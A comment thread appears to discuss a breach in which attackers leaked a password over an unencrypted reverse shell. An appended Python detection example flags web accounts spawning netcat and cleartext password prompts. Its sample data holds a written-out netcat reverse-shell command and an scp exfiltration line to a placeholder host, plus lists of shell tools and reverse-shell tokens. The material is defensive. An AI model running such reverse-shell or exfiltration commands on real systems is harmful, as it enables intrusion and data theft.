by isthrowaway 1575 days ago
The traffic containing the clear text password was not scp, it was the reverse shell they sent themselves. Reverse shells are unencrypted on the wire, and when scp prompted for the password, they typed it in over their reverse shell. A significant oversight on their part. If it was a team, it must have been a less experienced member who made that mistake.

As far as the SSL MITM goes, they indeed documented their attack with various files containing notes in English. They had a separate directory (within the target's folder) containing the certificates they were using in the attack.

1 comment

Can't help but imagine your www-data which spawned nc, and it seems too amateurish for a high-profile hacker group. It makes it seem as if they copy-pasted the first one-liner reverse shell found on Google. Even the Metasploit framework introduced payloads a while ago that do traffic encryption/obfuscation. Much more subtle reverse shells are used in the wild, where a compromised machine reaches out to the hacker's server once in a while, receives commands and dumps output, even over something like ICMP/Loki or Covert TCP.
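The two tells described in this thread (a web-server service account spawning nc, and a credential prompt answered over an unencrypted reverse shell) expressed as detection logic over constructed sample data. This is an added example for this thread, not code from either commenter; the process-event fields and the in/out chunk format are assumed, simplified shapes rather than any real sensor schema, and 203.0.113.5 is a TEST-NET placeholder address.

```python
import re
from dataclasses import dataclass

WEB_SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "httpd"}
SHELLS_AND_NETCAT = {"nc", "ncat", "netcat", "bash", "sh", "dash"}
# Command-line fragments typical of an interactive shell bound to a socket.
REVERSE_SHELL_TOKENS = (" -e ", " -c ", "/dev/tcp/")
# Matches a password prompt at the end of a chunk of server output.
PROMPT_RE = re.compile(rb"[Pp]assword:\s*$")


@dataclass
class ProcEvent:
    user: str   # account the process runs as (assumed field)
    image: str  # executable basename (assumed field)
    argv: str   # full command line (assumed field)


def is_suspicious_spawn(ev: ProcEvent) -> bool:
    """A web service account should serve requests; it launching nc or a
    shell with a socket-bound flag is the lineage the thread describes."""
    if ev.user not in WEB_SERVICE_ACCOUNTS or ev.image not in SHELLS_AND_NETCAT:
        return False
    padded = f" {ev.argv} "
    return any(tok in padded for tok in REVERSE_SHELL_TOKENS)


def password_sent_in_clear(chunks) -> bool:
    """chunks: ordered (direction, payload) pairs of one plaintext TCP session,
    'out' = victim host to operator, 'in' = operator to victim host. Returns
    True when a password prompt left the host and keystrokes came back on
    the same unencrypted channel, i.e. the credential crossed the wire."""
    awaiting_input = False
    for direction, payload in chunks:
        if direction == "out" and PROMPT_RE.search(payload):
            awaiting_input = True
        elif direction == "in" and awaiting_input and payload.strip():
            return True
    return False


# Constructed sample data (not from the incident in the thread).
SAMPLE_EVENTS = [
    ProcEvent("www-data", "apache2", "apache2 -k start"),
    ProcEvent("www-data", "nc", "nc 203.0.113.5 4444 -e /bin/sh"),
    ProcEvent("root", "bash", "bash -c /usr/local/bin/backup.sh"),
]
SAMPLE_SESSION = [
    ("in", b"scp loot.tgz user@203.0.113.5:/tmp/\n"),
    ("out", b"user@203.0.113.5's password: "),
    ("in", b"hunter2\n"),
]
```

Run against a real process log and a reassembled session, `is_suspicious_spawn` fires on the second event only and `password_sent_in_clear` fires on the sample session, which is exactly the combination the first comment reports.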